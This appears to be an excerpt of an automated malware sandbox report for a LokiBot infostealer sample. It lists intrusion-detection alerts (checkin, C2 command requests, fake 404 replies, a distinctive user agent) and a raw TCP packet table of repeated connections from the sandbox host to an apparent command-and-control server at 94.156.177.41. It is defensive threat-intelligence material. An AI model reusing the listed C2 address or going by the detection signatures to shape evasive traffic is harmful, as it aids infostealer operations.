2024-11-28T13:53:34.319262+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49913	94.156.177.41	80	TCP
2024-11-28T13:53:34.319262+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49913	94.156.177.41	80	TCP
2024-11-28T13:53:35.792109+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49913	94.156.177.41	80	TCP
2024-11-28T13:53:35.912159+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49913	TCP
2024-11-28T13:53:36.174269+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49917	94.156.177.41	80	TCP
2024-11-28T13:53:36.174269+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49917	94.156.177.41	80	TCP
2024-11-28T13:53:36.174269+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49917	94.156.177.41	80	TCP
2024-11-28T13:53:37.671479+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49917	94.156.177.41	80	TCP
2024-11-28T13:53:37.791691+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49917	TCP
2024-11-28T13:53:38.049671+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49923	94.156.177.41	80	TCP
2024-11-28T13:53:38.049671+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49923	94.156.177.41	80	TCP
2024-11-28T13:53:38.049671+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49923	94.156.177.41	80	TCP
2024-11-28T13:53:39.517673+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49923	94.156.177.41	80	TCP
2024-11-28T13:53:39.637803+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49923	TCP
2024-11-28T13:53:39.893533+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49928	94.156.177.41	80	TCP
2024-11-28T13:53:39.893533+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49928	94.156.177.41	80	TCP
2024-11-28T13:53:39.893533+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49928	94.156.177.41	80	TCP
2024-11-28T13:53:41.214371+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49928	94.156.177.41	80	TCP
2024-11-28T13:53:41.452206+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49928	TCP
2024-11-28T13:53:42.038877+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49931	94.156.177.41	80	TCP
2024-11-28T13:53:42.038877+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49931	94.156.177.41	80	TCP
2024-11-28T13:53:42.038877+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49931	94.156.177.41	80	TCP
2024-11-28T13:53:43.433051+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49931	94.156.177.41	80	TCP
2024-11-28T13:53:43.586239+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49931	TCP
2024-11-28T13:53:43.814508+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49936	94.156.177.41	80	TCP
2024-11-28T13:53:43.814508+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49936	94.156.177.41	80	TCP
2024-11-28T13:53:43.814508+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49936	94.156.177.41	80	TCP
2024-11-28T13:53:45.291369+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49936	94.156.177.41	80	TCP
2024-11-28T13:53:45.416486+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49936	TCP
2024-11-28T13:53:45.677207+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49942	94.156.177.41	80	TCP
2024-11-28T13:53:45.677207+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49942	94.156.177.41	80	TCP
2024-11-28T13:53:45.677207+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49942	94.156.177.41	80	TCP
2024-11-28T13:53:47.149209+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49942	94.156.177.41	80	TCP
2024-11-28T13:53:47.269321+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49942	TCP
2024-11-28T13:53:47.609817+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49948	94.156.177.41	80	TCP
2024-11-28T13:53:47.609817+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49948	94.156.177.41	80	TCP
2024-11-28T13:53:47.609817+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49948	94.156.177.41	80	TCP
2024-11-28T13:53:48.834119+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49948	94.156.177.41	80	TCP
2024-11-28T13:53:48.954029+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49948	TCP
2024-11-28T13:53:49.229391+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49951	94.156.177.41	80	TCP
2024-11-28T13:53:49.229391+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49951	94.156.177.41	80	TCP
2024-11-28T13:53:49.229391+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49951	94.156.177.41	80	TCP
2024-11-28T13:53:50.737812+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49951	94.156.177.41	80	TCP
2024-11-28T13:53:50.857824+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49951	TCP
2024-11-28T13:53:51.134807+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49954	94.156.177.41	80	TCP
2024-11-28T13:53:51.134807+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49954	94.156.177.41	80	TCP
2024-11-28T13:53:51.134807+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49954	94.156.177.41	80	TCP
2024-11-28T13:53:52.603990+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49954	94.156.177.41	80	TCP
2024-11-28T13:53:52.724013+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49954	TCP
2024-11-28T13:53:52.989363+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49959	94.156.177.41	80	TCP
2024-11-28T13:53:52.989363+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49959	94.156.177.41	80	TCP
2024-11-28T13:53:52.989363+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49959	94.156.177.41	80	TCP
2024-11-28T13:53:54.504785+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49959	94.156.177.41	80	TCP
2024-11-28T13:53:54.624745+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49959	TCP
2024-11-28T13:53:54.895598+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49965	94.156.177.41	80	TCP
2024-11-28T13:53:54.895598+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49965	94.156.177.41	80	TCP
2024-11-28T13:53:54.895598+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49965	94.156.177.41	80	TCP
2024-11-28T13:53:56.356808+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49965	94.156.177.41	80	TCP
2024-11-28T13:53:56.476885+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49965	TCP
2024-11-28T13:53:56.768164+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49970	94.156.177.41	80	TCP
2024-11-28T13:53:56.768164+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49970	94.156.177.41	80	TCP
2024-11-28T13:53:56.768164+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49970	94.156.177.41	80	TCP
2024-11-28T13:53:58.089738+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49970	94.156.177.41	80	TCP
2024-11-28T13:53:58.209770+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49970	TCP
2024-11-28T13:53:58.476192+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49975	94.156.177.41	80	TCP
2024-11-28T13:53:58.476192+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49975	94.156.177.41	80	TCP
2024-11-28T13:53:58.476192+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49975	94.156.177.41	80	TCP
2024-11-28T13:53:59.992228+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49975	94.156.177.41	80	TCP
2024-11-28T13:54:00.112160+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49975	TCP
2024-11-28T13:54:00.536337+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49979	94.156.177.41	80	TCP
2024-11-28T13:54:00.536337+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49979	94.156.177.41	80	TCP
2024-11-28T13:54:00.536337+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49979	94.156.177.41	80	TCP
2024-11-28T13:54:01.812286+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49979	94.156.177.41	80	TCP
2024-11-28T13:54:01.933027+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49979	TCP
2024-11-28T13:54:02.191446+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49984	94.156.177.41	80	TCP
2024-11-28T13:54:02.191446+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49984	94.156.177.41	80	TCP
2024-11-28T13:54:02.191446+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49984	94.156.177.41	80	TCP
2024-11-28T13:54:03.511707+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49984	94.156.177.41	80	TCP
2024-11-28T13:54:03.631691+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.5	49984	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2024 13:52:04.236696959 CET	49708	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:04.356868029 CET	80	49708	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:04.356952906 CET	49708	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:04.359332085 CET	49708	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:04.479630947 CET	80	49708	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:04.479690075 CET	49708	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:04.599642992 CET	80	49708	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:05.944139957 CET	80	49708	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:05.944281101 CET	80	49708	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:05.944288015 CET	49708	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:05.944344997 CET	49708	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:06.066854954 CET	80	49708	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:06.130779028 CET	49709	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:06.252717018 CET	80	49709	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:06.252897978 CET	49709	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:06.283209085 CET	49709	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:06.410429955 CET	80	49709	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:06.410511017 CET	49709	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:06.536931038 CET	80	49709	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:07.903688908 CET	80	49709	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:07.903841019 CET	49709	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:07.903939962 CET	80	49709	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:07.904030085 CET	49709	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:07.985693932 CET	49711	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:08.029609919 CET	80	49709	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:08.111799955 CET	80	49711	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:08.111881971 CET	49711	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:08.114020109 CET	49711	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:08.237617970 CET	80	49711	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:08.237689018 CET	49711	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:08.357779980 CET	80	49711	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:09.514312029 CET	80	49711	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:09.514334917 CET	80	49711	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:09.514499903 CET	49711	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:09.514499903 CET	49711	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:09.634906054 CET	80	49711	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:09.826821089 CET	49712	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:09.948884964 CET	80	49712	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:09.948967934 CET	49712	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:09.952279091 CET	49712	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:10.072426081 CET	80	49712	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:10.072483063 CET	49712	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:10.192854881 CET	80	49712	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:11.594536066 CET	80	49712	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:11.594608068 CET	80	49712	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:11.594715118 CET	49712	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:11.594748974 CET	49712	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:11.714786053 CET	80	49712	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:11.730525970 CET	49713	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:11.851219893 CET	80	49713	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:11.851428032 CET	49713	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:11.853466988 CET	49713	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:11.973452091 CET	80	49713	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:11.973666906 CET	49713	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:12.096559048 CET	80	49713	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:13.292371988 CET	80	49713	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:13.292491913 CET	80	49713	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:13.292547941 CET	49713	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:13.292573929 CET	49713	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:13.412589073 CET	80	49713	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:13.446327925 CET	49714	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:13.566427946 CET	80	49714	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:13.566514015 CET	49714	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:13.569083929 CET	49714	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:13.689404011 CET	80	49714	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:13.689498901 CET	49714	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:13.809497118 CET	80	49714	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:15.014285088 CET	80	49714	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:15.014448881 CET	80	49714	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:15.014453888 CET	49714	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:15.014504910 CET	49714	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:15.135211945 CET	80	49714	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:15.151086092 CET	49715	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:15.271121979 CET	80	49715	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:15.271219015 CET	49715	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:15.273422003 CET	49715	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:15.393717051 CET	80	49715	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:15.393769979 CET	49715	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:15.516611099 CET	80	49715	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:16.818991899 CET	80	49715	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:16.819103003 CET	49715	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:16.819144964 CET	80	49715	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:16.819216013 CET	49715	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:16.939117908 CET	80	49715	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:16.974941969 CET	49718	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:17.096725941 CET	80	49718	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:17.096829891 CET	49718	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:17.098931074 CET	49718	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:17.219099045 CET	80	49718	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:17.219155073 CET	49718	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:17.339143991 CET	80	49718	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:18.734575987 CET	80	49718	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:18.734744072 CET	80	49718	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:18.734775066 CET	49718	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:18.734798908 CET	49718	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:18.855201006 CET	80	49718	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:18.870480061 CET	49721	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:18.990593910 CET	80	49721	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:18.990696907 CET	49721	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:18.992889881 CET	49721	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:19.113708019 CET	80	49721	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:19.113785028 CET	49721	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:19.234515905 CET	80	49721	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:20.432812929 CET	80	49721	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:20.432892084 CET	80	49721	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:20.433012009 CET	49721	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:20.433012009 CET	49721	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:20.553024054 CET	80	49721	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:20.571300030 CET	49724	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:20.691402912 CET	80	49724	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:20.691509008 CET	49724	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:20.693635941 CET	49724	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:20.813647032 CET	80	49724	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:20.813749075 CET	49724	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:20.933706999 CET	80	49724	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:22.279855967 CET	80	49724	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:22.280015945 CET	49724	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:22.280045986 CET	80	49724	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:22.280095100 CET	49724	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:22.400000095 CET	80	49724	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:22.416784048 CET	49726	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:22.536734104 CET	80	49726	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:22.536818027 CET	49726	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:22.539007902 CET	49726	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:22.658930063 CET	80	49726	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:22.659041882 CET	49726	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:22.779395103 CET	80	49726	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:24.172015905 CET	80	49726	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:24.172138929 CET	80	49726	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:24.172204018 CET	49726	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:24.172204018 CET	49726	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:24.292203903 CET	80	49726	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:24.307523966 CET	49727	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:24.427475929 CET	80	49727	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:24.427601099 CET	49727	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:24.429666042 CET	49727	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:24.549702883 CET	80	49727	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:24.549788952 CET	49727	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:24.722112894 CET	80	49727	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:25.971957922 CET	80	49727	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:25.972024918 CET	80	49727	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:25.972126007 CET	49727	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:25.972183943 CET	49727	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:26.096508026 CET	80	49727	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:26.121695042 CET	49733	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:26.241755962 CET	80	49733	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:26.241864920 CET	49733	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:26.244560003 CET	49733	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:26.365528107 CET	80	49733	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:26.365633011 CET	49733	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:26.491128922 CET	80	49733	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:27.874193907 CET	80	49733	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:27.874305964 CET	80	49733	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:27.874306917 CET	49733	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:27.874375105 CET	49733	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:27.994452000 CET	80	49733	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:28.019143105 CET	49739	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:28.143258095 CET	80	49739	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:28.143369913 CET	49739	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:28.145422935 CET	49739	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:28.268826962 CET	80	49739	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:28.268944025 CET	49739	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:28.388942957 CET	80	49739	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:29.593564987 CET	80	49739	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:29.593683004 CET	80	49739	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:29.593698978 CET	49739	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:29.593729019 CET	49739	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:29.713773966 CET	80	49739	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:29.746747971 CET	49745	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:29.866712093 CET	80	49745	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:29.866847992 CET	49745	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:29.872065067 CET	49745	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:29.992073059 CET	80	49745	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:29.992183924 CET	49745	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:30.112190008 CET	80	49745	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:31.306025028 CET	80	49745	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:31.306157112 CET	80	49745	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:31.306294918 CET	49745	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:31.306444883 CET	49745	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:31.448206902 CET	49750	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:31.448628902 CET	80	49745	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:31.568234921 CET	80	49750	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:31.568326950 CET	49750	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:31.570786953 CET	49750	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:31.691521883 CET	80	49750	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:31.691657066 CET	49750	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:31.817192078 CET	80	49750	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:33.012461901 CET	80	49750	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:33.012638092 CET	80	49750	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:33.012666941 CET	49750	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:33.012690067 CET	49750	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:33.133068085 CET	80	49750	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:33.277242899 CET	49751	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:33.400872946 CET	80	49751	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:33.400970936 CET	49751	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:33.444705009 CET	49751	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:33.568337917 CET	80	49751	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:33.568486929 CET	49751	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:33.688431978 CET	80	49751	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:35.031781912 CET	80	49751	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:35.032011986 CET	80	49751	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:35.032115936 CET	49751	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:35.032196999 CET	49751	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:35.152256966 CET	80	49751	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:35.173510075 CET	49757	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:35.297784090 CET	80	49757	94.156.177.41	192.168.2.5
Nov 28, 2024 13:52:35.298861980 CET	49757	80	192.168.2.5	94.156.177.41
Nov 28, 2024 13:52:35.301023006 CET	49757	80	192.168.2.5	94.156.177.41
